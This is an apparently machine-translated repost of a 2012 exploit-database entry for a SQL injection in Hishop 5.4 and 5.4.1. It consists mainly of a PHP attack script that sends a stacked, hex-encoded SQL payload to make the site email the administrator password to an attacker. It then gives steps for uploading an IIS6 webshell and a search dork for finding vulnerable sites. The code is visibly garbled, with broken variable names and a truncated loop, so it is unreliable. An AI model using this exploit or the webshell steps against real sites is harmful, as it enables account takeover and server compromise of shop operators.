Hishop 5.4 & 5.4.1 SQL injection漏洞预警 -电脑资料

    # Exploit Title: [Hishop 5.4 & 5.4.1 SQL injection]

    # Date: [06-04-2012]

    # Author: [Hacker-Fire]

    # Vendor orSoftware Link: [http://www.hishop.com.cn/bbs/thread-htm-fid-13.html]

    # Version: [ 5.4 & 5.4.1 ]

    # Category:: [ webapps]

    # Google dork: [intext:Hishop 5.4]

    # Tested on: [Windows 7 ]

    ##################################################

    [~] P0c [~] :

    print_r ('

    + ------------------------- +

    Hishop 5.4 & 5.4.1 SQL injection the exploit By: Hacker-Fire

    + ------------------------- +

    ');

    if($ argc <3) {

    print_r ('

    + ------------------------- +

    Usage: php '. $ Argv [0].'Host Port Path RegMail

    Example:

    php '. $ argv [0].'localhost 80 / SHOES/category-92.aspx? valueStr = 35_0 ​​syc@myclover.org

    + ------------------------- +

    ');

    exit;

    }

    $ Host = $ argv [1];

    $ Port = $ argv [2];

    $ Path = $ argv [3];

    $ Mail = $ argv [4];

    $ Expdata = "";

    for($ i = 0; $ i

    $ Expdata = $ expdata. Dechex(ord ($ mail [$ i])). "00";

    $ Expdata = strtoupper($ expdata);

    $ Expdata = "% 27)% 20or% 201 = 1; DECLARE% 20 @ S% 20NVARCHAR (4000)% 20SET% 20 @ S = CAST (". $ Expdata. "2700% 20AS% 20NVARCHAR (4000))% 20EXEC (S); - ";

    GET ($ host, $ port, $ path, $ expdata, 30);

    functionGET ($ host, $ port, $ path, $ data, $ timeout, $ cookie = ") {

    $ Fp = fsockopen($ host, $ port, $ errno, $ errstr, 30);

    if(! $ fp) {

    echo"{$ the errstr} ({$ errno is})
\ n";

    exit;

    }

    $ ut = "GET $ path $ data HTTP/1.1 \ r \ n";

    $ Out. = "The Host: $ host: $ port \ r \ n";

    $ Out. = "The Connection: CLOSE \ r \ n \ r \ n \ r \ n";

    fwrite ($ fp, $ out);

    while(! feof($ fp)) {

    fgets($ fp, 128);

    }

    fclose ($ fp);

    }

    print_r ('

    + ------------------------- +

    [+] Get Manager, the Password

    [1] to [landing] - "[My Account] -"[personal information】

    [2] E-mail the administrator password.

    [3] the Good Luck!

    + ------------------------- +

    [+] Get the WebShell (the IIS6)

    Log in from [1] / admin / [commodity management] - "[Category template set】

    [2] the upload 1.asp;. Html

    [3] the Shell Address: http://127.0.0.1/Themes/default/zh-cn/categorythemes/1.asp;. Html

    + ------------------------- +

    ');

    ?>

    ##########################################################

    [»] Greetz to :

    [ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ]

    [ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ]

    [ And all my Freinds + Algerian Hackers ]

    ##########################################################

    # 1337day.com [2012-04-06]